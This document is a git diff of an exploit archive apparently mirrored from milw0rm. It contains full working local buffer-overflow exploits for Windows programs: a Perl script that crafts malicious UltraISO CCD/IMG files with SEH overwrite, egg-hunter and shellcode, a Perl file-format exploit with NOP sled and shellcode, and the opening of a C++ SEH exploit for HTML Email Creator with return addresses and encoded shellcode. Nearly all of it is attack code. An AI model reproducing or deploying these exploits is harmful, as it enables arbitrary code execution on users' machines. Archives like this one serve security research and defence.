+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\xB3\x61\xEB\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\xF7\x22\xF5\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x7E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6C\xC8\xA3\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF5\x11\xF4\x3F\x3F".
+	        "\x3F\x3F\x3F\x3F\x3F\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x48\x7B\xC2\xCB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\xF7\x9A\xBE\xBB\x20\x31\x69\x10\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x1B\xCB\xCB\x52\x52\xA4\xA4\xC5\x2D".
+	        "\xA6\xAC\x45\xE6\x00\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x71\x39\x28\x8E\x32".
+	        "\x21\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x65\x65\x8A\x8A\x52\x52\xA4\xA4\x99\xA6\xF6\xEE\x76\x12";
+my $ccd_data =  "\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F".
+	        "\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63".
+	        "\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B".
+	        "\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70".
+	        "\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F".
+	        "\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34".
+	        "\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72".
+	        "\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31".
+	        "\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B".
+	        "\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D".
+	        "\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F".
+	        "\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C".
+	        "\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D".
+	        "\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D".
+	        "\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31".
+	        "\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D".
+	        "\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A".
+	        "\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33".
+	        "\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31".
+	        "\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D".
+	        "\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D".
+	        "\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D".
+	        "\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".
+	        "\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";
+
+# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
+"\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x68".
+"\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x78\x32\x42\x42\x32\x41".
+"\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6d\x39\x6b\x4c\x6a".
+"\x48\x31\x54\x53\x30\x55\x50\x77\x70\x4c\x4b\x30\x45\x45\x6c\x4e".
+"\x6b\x71\x6c\x46\x65\x32\x58\x43\x31\x38\x6f\x4c\x4b\x62\x6f\x56".
+"\x78\x6c\x4b\x41\x4f\x41\x30\x45\x51\x7a\x4b\x37\x39\x6e\x6b\x74".
+"\x74\x4c\x4b\x34\x41\x38\x6e\x30\x31\x39\x50\x4f\x69\x6e\x4c\x4b".
+"\x34\x6b\x70\x53\x44\x66\x67\x4b\x71\x58\x4a\x34\x4d\x54\x41\x39".
+"\x52\x38\x6b\x6c\x34\x57\x4b\x32\x74\x41\x34\x34\x44\x74\x35\x7a".
+"\x45\x4c\x4b\x41\x4f\x41\x34\x44\x41\x6a\x4b\x61\x76\x4e\x6b\x36".
+"\x6c\x70\x4b\x4c\x4b\x43\x6f\x57\x6c\x63\x31\x58\x6b\x6e\x6b\x37".
+"\x6c\x6e\x6b\x66\x61\x38\x6b\x4c\x49\x31\x4c\x66\x44\x76\x64\x4b".
+"\x73\x47\x41\x59\x50\x50\x64\x4e\x6b\x77\x30\x30\x30\x4c\x45\x4b".
+"\x70\x70\x78\x44\x4c\x6c\x4b\x73\x70\x56\x6c\x6e\x6b\x72\x50\x47".
+"\x6c\x4c\x6d\x4c\x4b\x62\x48\x43\x38\x5a\x4b\x74\x49\x4c\x4b\x4f".
+"\x70\x6e\x50\x47\x70\x37\x70\x75\x50\x6e\x6b\x41\x78\x45\x6c\x31".
+"\x4f\x37\x41\x4c\x36\x61\x70\x36\x36\x4e\x69\x7a\x58\x4b\x33\x6b".
+"\x70\x63\x4b\x56\x30\x61\x78\x31\x6e\x4e\x38\x6d\x32\x72\x53\x55".
+"\x38\x4d\x48\x6b\x4e\x4e\x6a\x76\x6e\x32\x77\x59\x6f\x69\x77\x50".
+"\x63\x50\x61\x30\x6c\x65\x33\x56\x4e\x63\x55\x32\x58\x32\x45\x35".
+"\x50\x68";
+
+
+my $overflow1 = "\x41" x 10002;
+my $lookout   = "\x41" x 128;
+my $sehjmp    = "\xEB\x80\xFF\xFF";
+my $sehret    = "\x56\x38\x40\x00"; # 00403856 POP POP RETN
+my $shellhunter = "\x8b\xcc".
+		  "\xb8\x41\x41\x41\x41".
+		  "\x41".
+                  "\x36\x39\x01".
+                  "\x75\xf5".
+                  "\xff\xd1";
+my $len1 = 4091 - (length($shellcode) + 128 + 126) + 972; #Remove "+ 972" if you want the exploit to work if the CCD or IMG file are executed when passed as parameters to UltraISO.
+my $len2 = 126 - length($shellhunter);
+my $overflow2 = "\x42" x $len1;
+my $overflow3 = "\x41" x $len2;
+my $overflow4 = "\x43" x 5903;
+
+open (my $img_file, "> s.img"); #Important: IMG filename must be same as CCD filename.
+binmode $img_file;
+print $img_file $img_data1.
+		$overflow1.
+                $img_data2.
+                $overflow1.
+                $img_data3.
+                $overflow1.
+                $img_data4;
+close $img_file;
+open (my $ccd_file, "> s.ccd");
+print $ccd_file $ccd_data.
+		$lookout.$shellcode.$overflow2.$shellhunter.$overflow3.$sehjmp.$sehret.$overflow4;
+close $ccd_file;
+
+# milw0rm.com [2009-04-03]
diff --git a/platforms/windows/local/835.c b/platforms/windows/local/835.c
index a75fa8114..c459afb33 100755
--- a/platforms/windows/local/835.c
+++ b/platforms/windows/local/835.c
@@ -174,6 +174,6 @@ prgfiles, &dwBufLen);
 
        return 0;
 
-}
-
-// milw0rm.com [2005-02-22]
+}
+
+// milw0rm.com [2005-02-22]
diff --git a/platforms/windows/local/836.c b/platforms/windows/local/836.c
index 0499b162d..2110e1ad6 100755
--- a/platforms/windows/local/836.c
+++ b/platforms/windows/local/836.c
@@ -179,6 +179,6 @@ int main(void)
 
        return 0;
 
-}
-
-// milw0rm.com [2005-02-23]
+}
+
+// milw0rm.com [2005-02-23]
diff --git a/platforms/windows/local/837.c b/platforms/windows/local/837.c
index 464c743ff..1812c08eb 100755
--- a/platforms/windows/local/837.c
+++ b/platforms/windows/local/837.c
@@ -146,6 +146,6 @@ int main()
 
        return 0;
 
-}
-
-// milw0rm.com [2005-02-23]
+}
+
+// milw0rm.com [2005-02-23]
diff --git a/platforms/windows/local/8371.pl b/platforms/windows/local/8371.pl
index 4cafda3d8..0434a835a 100755
--- a/platforms/windows/local/8371.pl
+++ b/platforms/windows/local/8371.pl
@@ -1,28 +1,28 @@
-#!/usr/bin/perl
-# By AlpHaNiX [NullArea.Net]
-# alpha[at]hacker.bz
-# Made in Tunisia
-
-my $junk      = "\x41" x 96   ;     # whatever bytes
-my $nop       = "\x90" x 20   ;     # bla bla xD
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
-my $shellcode =
-    "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
-    "\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
-    "\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
-    "\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
-    "\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
-    "\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
-    "\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
-    "\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
-    "\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
-    "\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
-    "\xac\x2c\xc9\x40" ;
-my $ret       = "\x58\xF6\xE8\x73"; # pop ebx pop ret
-my $exploit = $junk.$nop.$shellcode.$ret;
-open (file,">>file.ofl");
-print file $exploit;
-close (file);
-print "done\n";
-
-# milw0rm.com [2009-04-08]
+#!/usr/bin/perl
+# By AlpHaNiX [NullArea.Net]
+# alpha[at]hacker.bz
+# Made in Tunisia
+
+my $junk      = "\x41" x 96   ;     # whatever bytes
+my $nop       = "\x90" x 20   ;     # bla bla xD
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
+my $shellcode =
+    "\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
+    "\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
+    "\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
+    "\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
+    "\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26".
+    "\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64".
+    "\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb".
+    "\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28".
+    "\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44".
+    "\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38".
+    "\xac\x2c\xc9\x40" ;
+my $ret       = "\x58\xF6\xE8\x73"; # pop ebx pop ret
+my $exploit = $junk.$nop.$shellcode.$ret;
+open (file,">>file.ofl");
+print file $exploit;
+close (file);
+print "done\n";
+
+# milw0rm.com [2009-04-08]
diff --git a/platforms/windows/local/839.cpp b/platforms/windows/local/839.cpp
index a40f8e49a..c8a58fe56 100755
--- a/platforms/windows/local/839.cpp
+++ b/platforms/windows/local/839.cpp
@@ -74,6 +74,6 @@ void main()
                }
        }
 
-}
-
-// milw0rm.com [2005-02-24]
+}
+
+// milw0rm.com [2005-02-24]
diff --git a/platforms/windows/local/8401.cpp b/platforms/windows/local/8401.cpp
index 491419f78..5f5e7132c 100755
--- a/platforms/windows/local/8401.cpp
+++ b/platforms/windows/local/8401.cpp
@@ -1,109 +1,109 @@
-/*    
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-   [ Discovered and Exploited by dun ]
-
-
- [ HTML Email Creator <= 2.1 build 668 ] (html) Local SEH Overwrite Exploit
-
- Vendor:    http://www.html-email.net/
- Download:  http://www.html-email.net/download/html2emailcreator.exe
-
- Vuln:
- <img src="520 x A">
-  or
- <script src="520 x A">
-  or
- <link href="520 x A">
-
-  ___________________________520_____________________________ 
- |                                                           |
- [ NOPs ][ jmp 11 ][ pop-pop-ret ][ NOPs ][ shellcode ][ NOPs ]
-    56       4           4           40       343         73   
- 
-  
- Greetz:  suN8Hclf, str0ke
- 
- [ dun'at'strcpy.pl / 2009 ] 
-*/
-
-
-#include <windows.h>
-#include <stdio.h>
-
-/*
-Tested on:      
-WIN XP SP2 with installed "PC TOOLS Spyware Doctor" from google pack
-/SafeSEH OFF     0x636e0000    0x63709000    6.1.0.2    C:\Program Files\Spyware Doctor\smum32.dll
-#define RET   0x636E34BC      // pop-pop-ret
-
-WIN XP without any upgrades
-kernel32.dll  0x77E9CB0E      pop EAX - pop - ret
-#define RET   0x77E9CB0E      // pop-pop-ret
-*/
-
-
-#define RET   0x77E9CB0E      // pop-pop-ret
-#define JMP   0x909011EB      // short jump (jmp 11)
-#define LEN   520
-#define NOP   0x90
-
-
-// win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-char scode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48"
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38"
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
